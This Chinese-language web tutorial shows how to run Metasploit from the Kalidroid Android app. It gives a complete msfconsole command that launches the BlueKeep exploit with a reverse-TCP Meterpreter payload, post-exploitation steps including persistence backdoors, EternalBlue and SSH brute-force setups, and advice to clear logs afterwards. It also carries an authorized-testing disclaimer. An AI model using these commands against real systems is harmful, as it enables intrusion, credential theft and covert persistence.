前言
Metasploit(简称 MSF)是渗透测试行业标准漏洞利用框架,传统只能在电脑 Kali 运行,而Kalidroid将 MSF 完整移植到安卓手机,封装全图形可视化操作界面,无需记忆冗长命令,手机端即可完成漏洞加载、载荷配置、监听上线、漏洞攻击全流程。
本文基于真机 (华为p90,Kalidroid v1.3.29-debug)全套实操截图,以 BlueKeep(CVE-2019-0708 RDP 远程代码执行漏洞)为例手把手教学,所有操作仅允许在拥有完整书面授权的设备环境开展测试。
一、什么是 Kalidroid?
Kalidroid 是一款面向安全研究人员、渗透测试人员及网络爱好者的 Android 应用,它能够在原生 Android 8+ 系统上以接近原生 CPU 速度运行完整、持久的 Kali Linux 环境。与传统方案不同,Kalidroid 无需 root 权限、无需软件 chroot、无需自行编译内核。它基于 Android 虚拟化框架(AVF)与 pKVM 硬件虚拟化构建,在主机 Android 与客户机虚拟机之间实施完整的内存隔离,实现接近原生的 CPU 性能。
Kalidroid 内置或支持一键部署多种渗透测试工具,包括 NMAP、WPScan 以及本教程的主角——Metasploit Framework。
一、Metasploit 环境准备
首次打开如图,点击安装即可,根据手机性能而定30-60分钟

一、Metasploit 模块入口与环境状态介绍
1. 模块打开方式
打开 Kalidroid 主界面,下滑功能列表,找到红框标注的 Metasploit 选项,点击进入框架配置页面。

界面顶部会显示METASPLOIT 环境状态:
- 状态为「活跃」:代表 MSF 组件、PostgreSQL 数据库已完整安装,可直接启动 msfconsole;
- 若状态异常,点击「重新扫描」自动修复缺失依赖与数据库配置。
2. MODE 运行模式四大功能分区
页面内置 4 种 MSF 核心运行模式,适配不同渗透场景:
| 模式 | 功能用途 | 使用场景 |
|---|---|---|
| msfconsole(默认选中) | 交互式漏洞控制台,加载漏洞模块、配置目标、执行攻击 | 漏洞验证、内网渗透、漏洞利用(本次教程核心) |
| msfvenom | 免杀木马、反弹 Shell 载荷生成器 | 制作安卓 / Windows/Linux 后门程序 |
| Handler | 独立监听程序,后台等待目标反弹连接 | 单独开启端口监听,配合外部生成的木马 |
| msfrpcd | MSF 远程 RPC 服务,API 调用框架 | 自动化脚本、第三方工具联动 MSF |
本教程主要使用 msfconsole 入口进行漏洞利用操作。
三、模块预设与快速利用
Kalidroid 的 Metasploit 模块内置了多个常用漏洞利用预设,方便快速启动:
3. 模块预设(内置一键漏洞模板)
软件提前封装高频热门漏洞模块,无需手动输入漏洞路径,一键选中加载:
- EternalBlue(永恒之蓝 MS17-010):Windows SMBv1 高危远程溢出
- BlueKeep(CVE-2019-0708):Windows RDP 远程代码执行(本次实操案例)
- Log4Shell(CVE-2021-44228):Java Log4j 远程注入漏洞
- SSH login:SSH 服务弱口令爆破辅助模块
- SMB version:SMB 服务版本探测
- HTTP login:网站基础认证爆破
- Multi handler:多架构通用反弹监听
- Persistence:Windows 注册表持久化后门模块
本次实操选择 BlueKeep Windows·RDP RCE 漏洞模板。

二、漏洞模块、载荷可视化配置详解
点击 BlueKeep 预设模板后,自动跳转漏洞参数配置页面,分为四大核心配置区:模块路径、有效载荷、目标与监听、自定义高级参数。
1. 模块路径(自动填充)
exploit/windows/rdp/cve_2019_0708_bluekeep
对应 MSF 原生漏洞路径,图形界面自动填充,无需手动输入,切换漏洞模板会自动变更路径。
2. 有效载荷(Payload)选择
载荷是漏洞利用成功后,获取目标主机控制权的交互程序,软件内置全平台载荷分类:
Windows 主机推荐(本次案例)
meterpreter (win x64) windows · staged- 优势:Windows 64 位系统专用,Meterpreter 全功能交互式 shell,支持文件上传下载、屏幕截图、权限提升、进程管理,分段传输稳定性强。
其他可选 Windows 载荷:
- meterpreter (win x86):32 位 Windows 系统专用
- shell (win x64):基础 cmd 反弹 shell,功能简陋
Linux / 安卓平台载荷
- meterpreter (linux x64/arm64):服务器、ARM 安卓设备交互 shell
- meterpreter (android):APK 安卓木马载荷
Web 脚本载荷
python/php reverse_tcp:网站漏洞专用反弹脚本载荷
3. 目标与监听核心参数(攻击成功关键)

① 目标配置区
- RHOSTS:填写存在漏洞的目标设备 IP,例:
192.168.10.4(Nmap 扫描发现的 Windows 主机) - RPORT:漏洞对应服务端口,BlueKeep 漏洞默认 RDP 端口 3389,可留空自动使用模块默认端口
② 监听器配置区(LHOST/LPORT)
- LHOST:本机回连 IP,填写手机当前局域网 IP
192.168.10.6,目标漏洞触发后主动连接该地址 - LPORT:监听端口,通用默认 4444,可自定义 5000、8080 等未占用端口
提示说明:
内网环境填写手机局域网 IP;外网公网测试需填写公网 IP,并在路由器做端口转发映射 LPORT 端口。
4. 自定义参数与全局启动设置

自定义参数(高级稳定配置)
AutoRunScript=multi_console_command
ExitOnSession=false
参数作用:
- AutoRunScript:会话上线自动执行预设脚本,简化后续操作
- ExitOnSession=false:一条目标会话关闭后,监听不终止,持续等待新主机上线
底部全局设置开关
- 自动初始化 msfdb:开启后自动加载 MSF 数据库,可保存扫描主机、漏洞会话、凭证信息;关闭则无数据库功能
- 安静横幅(-q 参数):跳过 MSF 启动大段 ASCII 字符画,加快启动速度
- ANSI 颜色:开启终端彩色日志,区分漏洞报错、上线会话、成功提示
三、一键启动 msfconsole 执行漏洞攻击
所有参数配置完成后,页面底部蓝色按钮「打开 msfconsole」,点击自动执行拼接完整 MSF 启动命令:
kalidroid-msfdb; msfconsole -q -x 'workspace default; use exploit/windows/rdp/cve_2019_0708_bluekeep; set payload windows/x64/meterpreter/reverse_tcp; set RHOSTS 192.168.10.4; set LHOST 192.168.10.6; set LPORT 4444; set ExitOnSession false; exploit'

程序自动完成全套操作:
- 初始化 MSF 数据库
- 安静模式启动控制台
- 切换默认工作区 default
- 自动加载 BlueKeep 漏洞模块
- 自动设置 win64 meterpreter 载荷
- 填充目标 IP、监听地址端口
- 后台开启持续监听
- 执行 exploit 发起漏洞攻击
攻击成功后操作
漏洞利用成功,目标主机主动回连手机监听端口,生成 Meterpreter 会话,可执行操作:
- 系统信息查询:sysinfo 查看系统版本、架构
- 权限提升:getsystem 获取 Windows 管理员最高权限
- 文件管理:upload/download 上传下载主机文件
- 屏幕截图:screenshot 抓取目标桌面
- 持久化后门:添加开机自启维持长期访问
四、完整渗透链路搭配使用流程(结合之前 Nmap 教程)
- Nmap 内网扫描:探测内网存活主机,识别开放 3389(RDP)、445(SMB)高危端口
- 资产筛选:找到开启 RDP 3389 的 Windows 主机,确认目标存在 BlueKeep 漏洞风险
- 打开 Kalidroid Metasploit 模块,选择对应漏洞模板 BlueKeep
- 配置 win x64 Meterpreter 载荷,填写目标 IP 与手机监听地址
- 一键启动 msfconsole 发起攻击,等待会话上线
- 利用 Meterpreter 收集目标数据、横向渗透内网其他设备
五、多场景模块使用方案
场景 1:永恒之蓝 SMB 漏洞攻击(MS17-010)
- 预设模板选择 EternalBlue
- 载荷同样选择 windows/x64/meterpreter/reverse_tcp
- RHOST 填写开放 445 端口的 Windows 主机 IP,RPORT 默认 445 无需修改
- LHOST/LPORT 填写手机局域网监听地址,启动攻击
场景 2:SSH 弱口令爆破
- 预设模板选择 SSH login
- 无需配置反弹载荷,仅设置 RHOST 目标 IP、账号密码字典
- 启动后自动暴力破解 SSH 登录凭证
场景 3:独立木马监听(Handler 模式)
- MODE 切换为 Handler,仅配置 LHOST、LPORT 与对应载荷
- 先用 msfvenom 生成 Windows / 安卓木马程序
- 将木马在目标设备执行,Handler 等待反弹会话上线
六、常见故障排错指南
| 问题现象 | 故障原因 | 解决办法 |
|---|---|---|
| MSF 环境显示非活跃,无法启动 | 数据库损坏、依赖缺失 | 点击「重新扫描」自动修复组件;重启 Kalidroid |
| 攻击无会话上线,漏洞利用失败 | 1. 目标无对应漏洞;2. 防火墙拦截 3389/4444 端口;3.LHOST 填写错误 | 重新 Nmap 确认端口;关闭目标防火墙;核对手机局域网 IP |
| 启动 msfconsole 卡顿闪退 | 线程占用过高、手机内存不足 | 关闭后台其他 APP;关闭自动数据库初始化开关;拆分分段扫描攻击 |
| 载荷不兼容,攻击直接报错 | 系统架构匹配错误(32 位 / 64 位选错) | Windows 10/11 主流选择 win x64 载荷,老旧 XP 选用 win x86 |
| 会话上线后立刻断开 | ExitOnSession 参数开启,单条会话关闭即停止监听 | 自定义参数添加 ExitOnSession=false |
七、法律合规重要警示
- 严禁对未取得书面授权的服务器、电脑、智能设备执行漏洞利用、渗透攻击,私自测试、入侵他人设备违反《网络安全法》,需承担民事、行政乃至刑事责任。
- 本教程仅用于企业内部安全自查、网络安全专业学习、授权环境漏洞修复演练。
- 测试完成后及时关闭监听端口、删除后门程序、清理 MSF 扫描日志,消除测试痕迹。
教程总结
- Kalidroid 内置图形化 Metasploit 框架,安卓手机脱离电脑完成全套漏洞利用,内置主流漏洞一键模板,无需手写复杂命令;
- 核心操作逻辑:选定漏洞模板 → 匹配对应系统载荷 → 填写目标 IP + 本机监听地址 → 一键启动攻击;
- 可与 Nmap、SubFinder 工具联动,形成「资产收集→漏洞探测→漏洞利用」完整移动端渗透测试链路;
- 内网测试重点保证 LHOST 为手机局域网 IP,端口无防火墙拦截,才能稳定获取反弹会话。
往期 & 下期预告
© 版权声明
1、本网站名称:
X黑手网
2、本站永久网址:https://xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
7.本站原创内容版权归 X黑手网 及对应作者共同所有,欢迎转载,转载请务必注明原文出处及作者信息。
2、本站永久网址:https://xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
7.本站原创内容版权归 X黑手网 及对应作者共同所有,欢迎转载,转载请务必注明原文出处及作者信息。
THE END









暂无评论内容